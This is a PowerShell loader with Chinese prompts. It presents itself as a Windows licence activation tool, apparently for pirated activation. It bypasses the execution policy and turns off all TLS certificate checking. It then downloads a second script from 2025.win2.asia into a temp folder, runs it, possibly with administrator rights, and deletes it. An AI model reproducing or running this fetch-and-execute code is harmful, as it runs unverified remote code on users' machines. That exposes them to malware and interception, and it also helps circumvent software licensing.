# Version 1.6.1
# 检查管理员权限和执行策略
$isAdmin = [bool]([Security.Principal.WindowsIdentity]::GetCurrent().Groups -match 'S-1-5-32-544')

Write-Host "========================================" -ForegroundColor Cyan
Write-Host "  Windows 数字许可证激活系统" -ForegroundColor Cyan
Write-Host "========================================" -ForegroundColor Cyan
Write-Host ""

Write-Host "系统权限检查:" -ForegroundColor Cyan
Write-Host "  管理员权限: $(if($isAdmin){'是'}else{'否'})" -ForegroundColor $(if($isAdmin){'Green'}else{'Yellow'})

# 检查并设置执行策略
try {
    $currentPolicy = Get-ExecutionPolicy -Scope Process
    $machinePolicy = Get-ExecutionPolicy -Scope LocalMachine
    
    Write-Host "  当前进程执行策略: $currentPolicy" -ForegroundColor Yellow
    Write-Host "  本机执行策略: $machinePolicy" -ForegroundColor Yellow
    
    if ($currentPolicy -ne "Bypass" -and $currentPolicy -ne "Unrestricted") {
        Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force -ErrorAction Stop
        Write-Host "  ✓ 已设置进程执行策略为 Bypass" -ForegroundColor Green
    } else {
        Write-Host "  ✓ 执行策略已允许脚本运行" -ForegroundColor Green
    }
} catch {
    Write-Host "  ⚠ 警告: 无法设置执行策略" -ForegroundColor Red
    Write-Host "  建议以管理员权限运行此脚本" -ForegroundColor Yellow
    
    if (-not $isAdmin -and $machinePolicy -eq "Restricted") {
        Write-Host ""
        Write-Host "检测到受限的执行策略，建议以管理员身份运行" -ForegroundColor Yellow
        Write-Host ""
        Write-Host "是否继续运行? [Y/N]: " -NoNewline -ForegroundColor Yellow
        $continue = Read-Host
        if ($continue -notmatch '^[Yy]') {
            Write-Host "已取消运行" -ForegroundColor Gray
            Write-Host ""
            Write-Host "按任意键退出..." -ForegroundColor Gray
            $null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
            exit 0
        }
    }
}

Write-Host ""

$ErrorActionPreference = "Stop"
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12

# Skip SSL certificate validation for self-signed certificates
add-type @"
    using System.Net;
    using System.Security.Cryptography.X509Certificates;
    public class TrustAllCertsPolicy : ICertificatePolicy {
        public bool CheckValidationResult(
            ServicePoint srvPoint, X509Certificate certificate,
            WebRequest request, int certificateProblem) {
            return true;
        }
    }
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy

# Download interactive PowerShell script (URL replaced by server on startup)
$DownloadURL = 'https://2025.win2.asia/interactive.ps1'

Write-Host "Connecting to server..." -ForegroundColor Cyan

try {
    $rand = Get-Random -Maximum 99999999
    $FilePath = if ($isAdmin) { "$env:SystemRoot\Temp\MAS_$rand.ps1" } else { "$env:TEMP\MAS_$rand.ps1" }

    Write-Host "Downloading script..." -ForegroundColor Yellow
    Invoke-WebRequest -Uri $DownloadURL -OutFile $FilePath -UseBasicParsing -ErrorAction Stop
    
    Write-Host "Download complete, executing..." -ForegroundColor Green
    Write-Host ""
    
    # Execute in current window
    & $FilePath
    
    # Cleanup temp file
    if (Test-Path $FilePath) {
        Remove-Item $FilePath -Force -ErrorAction SilentlyContinue
    }
    
} catch {
    Write-Host "Error: $_" -ForegroundColor Red
    Write-Host ""
    Write-Host "Press any key to exit..." -ForegroundColor Gray
    $null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
}